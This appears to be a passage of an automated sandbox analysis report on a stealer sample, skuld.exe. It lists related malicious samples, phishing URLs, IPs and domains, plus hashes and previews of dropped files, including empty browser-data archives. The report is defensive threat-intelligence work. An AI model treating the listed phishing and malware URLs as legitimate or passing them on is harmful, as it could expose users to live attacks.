                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                          1776871603.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                          • ip-api.com/line/
                                                                                                                                          AWB_6654345699876T5332222345667.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                          XLUzlBAxvg.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                          162.159.136.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                          • discord.com/administrator/index.php

                                                                                                                                          Domains

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          discord.comftaHTqkV.posh.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.128.233
                                                                                                                                          path.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.136.232
                                                                                                                                          SecuriteInfo.com.Trojan.Siggen21.26995.15475.25038.exeGet hashmaliciousPython Stealer, Blank Grabber, XWormBrowse
                                                                                                                                          • 162.159.137.232
                                                                                                                                          Dropper.exeGet hashmaliciousAsyncRAT, Trap Stealer, XWormBrowse
                                                                                                                                          • 162.159.135.232
                                                                                                                                          Launcher.exeGet hashmaliciousGrowtopia, Phoenix StealerBrowse
                                                                                                                                          • 162.159.135.232
                                                                                                                                          Launcher.exeGet hashmaliciousGrowtopiaBrowse
                                                                                                                                          • 162.159.137.232
                                                                                                                                          Launcher.exeGet hashmaliciousGrowtopia, Phoenix StealerBrowse
                                                                                                                                          • 162.159.128.233
                                                                                                                                          SecuriteInfo.com.FileRepMalware.27385.1483.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                                          • 162.159.135.232
                                                                                                                                          d1e371d754658620e3ea7abf8c49cffe4cd427d1a8a40.exeGet hashmaliciousPython Stealer, Blank Grabber, NjratBrowse
                                                                                                                                          • 162.159.136.232
                                                                                                                                          r-c.exeGet hashmaliciousPython Stealer, Empyrean, Quasar, Discord Token StealerBrowse
                                                                                                                                          • 162.159.136.232
                                                                                                                                          ip-api.comSilverBullet. v1.1.4.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          zlient.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          config.exeGet hashmaliciousXWormBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          fTCzwFJhuy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          boyjhpskdfawd.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          KoaguarLoader.exeGet hashmaliciousSalat Stealer, XWormBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          1776871603.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          AWB_6654345699876T5332222345667.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          XLUzlBAxvg.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          api.ipify.orgvirus.7zGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.26.12.205
                                                                                                                                          https://www.canva.com/design/DAGhb8U4chg/3aIOcMOYfXFvNu6pkMJtcA/view?utm_content=DAGhb8U4chg&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=he54ee766c5Get hashmaliciousInvisible JS, Tycoon2FABrowse
                                                                                                                                          • 104.26.13.205
                                                                                                                                          Service.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          Arly.exeGet hashmaliciousDiscord Token Stealer, PRYSMAX STEALER, RHADAMANTHYS, XmrigBrowse
                                                                                                                                          • 104.26.13.205
                                                                                                                                          T&S-WAN FUNG GMT FTY LTD (CW0007)-Statement as at 28 Feb 2025.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          https://www.livemap-loads.com/login/Get hashmaliciousNetSupport RAT, CAPTCHA Scam ClickFixBrowse
                                                                                                                                          • 104.26.12.205
                                                                                                                                          https://www.livemap-loads.com/login/Get hashmaliciousNetSupport RAT, CAPTCHA Scam ClickFixBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          Wire Remittance Detail.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 104.26.13.205
                                                                                                                                          TcSzPgyAqC1WEJQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 104.26.12.205
                                                                                                                                          y27AF4qx0Q.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 104.26.13.205
                                                                                                                                          api.gofile.ioDropper.exeGet hashmaliciousAsyncRAT, Trap Stealer, XWormBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          NightFixed 1.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          send.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          VRChat_ERP_Setup 1.0.0.msiGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          VGjI0Z6AiG.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          windowsupdate.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          windowsupdate.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          Actionable_Insights_09970025e8865.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                          • 45.112.123.126

                                                                                                                                          ASNs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          CLOUDFLARENETUSMALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          RFQ- Italy.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                          • 104.21.80.1
                                                                                                                                          https://app.storylane.io/share/ttfgdirdpl74Get hashmaliciousInvisible JS, Tycoon2FABrowse
                                                                                                                                          • 104.16.4.189
                                                                                                                                          Inv#8653763981_2sfgPaymentAdvice.svgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 172.67.158.181
                                                                                                                                          https://marktmagie.com/auth8523796254hfdhsf734/ogo00dex.html#uiptcgcu@uiprail.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.17.202.1
                                                                                                                                          Shinhan_DocuSign_312047735687684052652423710713974466111628395562753690xqIDWOeXtHYBeNKrTAww.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          virus.7zGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.26.12.205
                                                                                                                                          https://www.directhealthcaregroup.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          .svgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.18.11.207
                                                                                                                                          Transferencia 6997900002017937.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 104.21.96.1
                                                                                                                                          CLOUDFLARENETUSMALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          RFQ- Italy.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                          • 104.21.80.1
                                                                                                                                          https://app.storylane.io/share/ttfgdirdpl74Get hashmaliciousInvisible JS, Tycoon2FABrowse
                                                                                                                                          • 104.16.4.189
                                                                                                                                          Inv#8653763981_2sfgPaymentAdvice.svgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 172.67.158.181
                                                                                                                                          https://marktmagie.com/auth8523796254hfdhsf734/ogo00dex.html#uiptcgcu@uiprail.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.17.202.1
                                                                                                                                          Shinhan_DocuSign_312047735687684052652423710713974466111628395562753690xqIDWOeXtHYBeNKrTAww.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          virus.7zGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.26.12.205
                                                                                                                                          https://www.directhealthcaregroup.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          .svgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.18.11.207
                                                                                                                                          Transferencia 6997900002017937.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 104.21.96.1
                                                                                                                                          OVHFRPURCHASE-ORDER-SINCOAUTOMATION-PO3223090781-Ref 6421SINCO-AUTOMATION.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 5.196.134.71
                                                                                                                                          20250031011(12 Mar 2025).pdf.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                          • 91.134.10.168
                                                                                                                                          20250031011(12 Mar 2025).pdf.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                          • 91.134.82.79
                                                                                                                                          https://cn11.web.id/Statement.pdf.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                          • 51.79.157.177
                                                                                                                                          https://cn11.web.id/E-Statment-PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                          • 51.79.157.177
                                                                                                                                          VirusShare_6623297b20fa16eb42b992b6c55c53cd.exeGet hashmaliciousSalityBrowse
                                                                                                                                          • 37.187.202.101
                                                                                                                                          https://site-xtxg5.powerappsportals.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 54.37.79.95
                                                                                                                                          rustdesk-host=desk.connectoo.fr,key=X8QnRZLDi5KgVjdVTKCsUcepmvtWc6ZCP7CryF1bGjQ=,.exeGet hashmaliciousRUSTDESKBrowse
                                                                                                                                          • 5.196.204.83
                                                                                                                                          rustdesk-host=desk.connectoo.fr,key=X8QnRZLDi5KgVjdVTKCsUcepmvtWc6ZCP7CryF1bGjQ=,.exeGet hashmaliciousRUSTDESKBrowse
                                                                                                                                          • 5.196.204.83
                                                                                                                                          biopderfawd.exeGet hashmaliciousXmrigBrowse
                                                                                                                                          • 54.37.137.114
                                                                                                                                          TUT-ASUSSilverBullet. v1.1.4.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          config.exeGet hashmaliciousXWormBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          fTCzwFJhuy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          boyjhpskdfawd.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          KoaguarLoader.exeGet hashmaliciousSalat Stealer, XWormBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          1776871603.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          AWB_6654345699876T5332222345667.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          XLUzlBAxvg.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          WAp70ZBSpL.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                          • 208.95.112.1

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          No context

                                                                                                                                          Dropped Files

                                                                                                                                          No context

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):20940
                                                                                                                                          Entropy (8bit):5.606057975318633
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:ACBrkxWdQ6tJpvHSXhr74YjHPnHfOUj7YIi03b7gXCGtGb5gqT:LrzQ6L4XhrsEPHfTj7b5ozGb+qT
                                                                                                                                          MD5:965659722359C9D2DF4A71A5F0DA07BC
                                                                                                                                          SHA1:5C37A659C55234DF84A441E4B4515BC4DB216310
                                                                                                                                          SHA-256:A1C2BE98920247E2A120EF87B4F077162F6362838745AE11CDBA69AD2AA452A2
                                                                                                                                          SHA-512:82D80E3C970905CE2415259F19AC73B2FF93E8ECAFAE60EA8233B3162930D3658F3B72406409EBC87ED2B9987D0FA2016E92D9E12FB94764DD98D196B6A8EF65
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@...e...................{.s.........o.c...\..........@..........H...............o..b~.D.poM...H..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....}.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.k.....#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                                                                                                                                          C:\Users\user\AppData\Local\Temp\RESD9F3.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4a2, 9 symbols, created Wed Mar 12 10:51:19 2025, 1st section name ".debug$S"
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1352
                                                                                                                                          Entropy (8bit):4.01954325905695
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:H/i29c+beBQtXNeHGPYwKsVe2NII+ycuZhNOakSmPNnqSIEgd:ffiBQumPnKsQ2u1ulOa3aqSIP
                                                                                                                                          MD5:490091A699795F5E02501A6E4095E375
                                                                                                                                          SHA1:F3C42AD835DDDE34BF5EBA257B17348AE40D548A
                                                                                                                                          SHA-256:8C88D7AB14956527D681630124BB7D82765843B37EBA35DEF84F093BA9325CB1
                                                                                                                                          SHA-512:FA5B7BD116DB96C1AAA77C551129D83B4EB4D32764CC9155FB4734BB004650FE9C5EF3890912D532249DE1FEFE377135A274C4482037062CFF347E4CA7E9A873
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L...'g.g.............debug$S........d...................@..B.rsrc$01........X.......H...........@..@.rsrc$02........P...R...............@..@........S....c:\Users\user\AppData\Local\Temp\dh1o0wbe\CSC88D051478A0408BB4BF8545E397BDC4.TMP.....................I&......T...........4.......C:\Users\user\AppData\Local\Temp\RESD9F3.tmp.-.<....................a..Microsoft (R) CVTRES.t.=..cwd.C:\Users\user\AppData\Local\Temp\vw7TwX1TN1.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.h.1.o.0.w.b.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_004kymzp.d0t.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ike0vdc.rvv.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b10pwot0.wzi.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddzoy5um.f2b.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmf3j4zt.fhv.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4gwby2m.qdp.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ic0akmm2.gsi.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnium1xo.ce5.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0gvfzue.1op.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfxmxrk5.ddw.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\browsers.zip

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\skuld.exe
                                                                                                                                          File Type:Zip archive data (empty)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):22
                                                                                                                                          Entropy (8bit):1.0476747992754052
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:pjt/l:Nt
                                                                                                                                          MD5:76CDB2BAD9582D23C1F6F4D868218D6C
                                                                                                                                          SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
                                                                                                                                          SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
                                                                                                                                          SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:PK....................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\commonfiles.zip

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\skuld.exe
                                                                                                                                          File Type:Zip archive data (empty)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):22
                                                                                                                                          Entropy (8bit):1.0476747992754052
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:pjt/l:Nt
                                                                                                                                          MD5:76CDB2BAD9582D23C1F6F4D868218D6C
                                                                                                                                          SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
                                                                                                                                          SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
                                                                                                                                          SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:PK....................

